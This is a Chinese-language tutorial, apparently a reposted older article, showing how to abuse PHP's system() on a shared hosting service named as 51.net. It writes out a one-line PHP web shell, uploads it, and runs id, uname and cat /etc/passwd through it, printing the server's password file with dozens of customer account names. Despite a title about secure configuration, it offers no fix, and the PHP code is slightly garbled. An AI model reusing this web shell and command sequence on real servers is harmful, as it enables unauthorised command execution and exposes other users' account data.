构建Linux下的安全 PHP配置漏洞攻击

　这些站点的问题主要出在允许使用system（），exec（）等等这些函数，熟悉PHP的朋友应该知道，这些函数是调用系统指令的（虽然通过web server PHP程序只能有nobody权限），而且一般用户只要申请一个空间就可以获取局部的可写权限，令用户可以写一个web shell程序执行命令。在这些服务器上一般用户不能够登陆，也就是nologin（没有登陆shell,管理员可没那么"慷慨"!），这样利用system（），exec（）这些函数就可以bind一个shell出来~!本文以虎翼网（www.51.net）的空间为例子（他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器）：

　　1.写一个webshell先（PHP很容易做到）

　　>PHP

　　#shell.PHP3

　　echo"";

　　system（"$cmd"）；

　　echo"

　　";

　　>

　　2.上传到空间

　　3.执行（具体的服务器马赛克处理）

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=id （看一下权限到底多大）

　　uid=171047（xxxx） gid=51（xxx） groups=51（xxx）， 65534（nobody）

　　root真的很吝啬啊！

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=uname -ras（看看系统）

　　FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20

　　00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=cat

　　/etc/passwd（shadow是铁定看不到）

　　root:*:0:0:Charlie &:/root:/bin/csh

　　toor:*:0:0:Bourne-again Superuser:/root:

　　daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin

　　operator:*:2:5:System &:/:/sbin/nologin

　　bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin

　　tty:*:107353:51:USER:/home/tty:/local/bin/null

　　kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin

　　games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

　　news:*:8:8:News Subsystem:/:/sbin/nologin

　　man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

　　bind:*:53:53:Bind Sandbox:/:/sbin/nologin

　　uucp:*:66:66:UUCP

　　pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico

　　xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin

　　pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin

　　ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin

　　nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

　　quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin

　　quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin

　　quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin

　　tian:*:1002:1002::/local/tian:/local/bin/ksh

　　sysadmin:*:1001:1001:System

　　Administrator:/local/sysadmin:/local/bin/ksh

　　test2:*:9999:51::/home/test2:/local/bin/null

　　xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin

　　zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null

　　yes2:*:106202:51:USER:/home/yes2:/local/bin/null

　　daboy:*:106203:51:USER:/home/daboy:/local/bin/null

　　yesky:*:106204:51:USER:/home/yesky:/local/bin/null

　　yesk:*:106205:51:USER:/home/yesk:/local/bin/null

　　lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null

　　fog:*:106207:51:USER:/home/fog:/local/bin/null

　　renshou:*:106208:51:USER:/home/renshou:/local/bin/null

　　hilen:*:106209:51:USER:/home/hilen:/local/bin/null

　　hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin

　　xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin

　　wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null

　　larry:*:106213:51:USER:/home/larry:/local/bin/null

　　sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null

　　everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null

　　linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null

　　baobao:*:106217:51:USER:/home/baobao:/local/bin/null

　　chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null

　　hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null

　　dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null

　　simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null

　　chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null

　　lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null

　　zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null

　　pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null

　　startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null

(责任编辑：admin)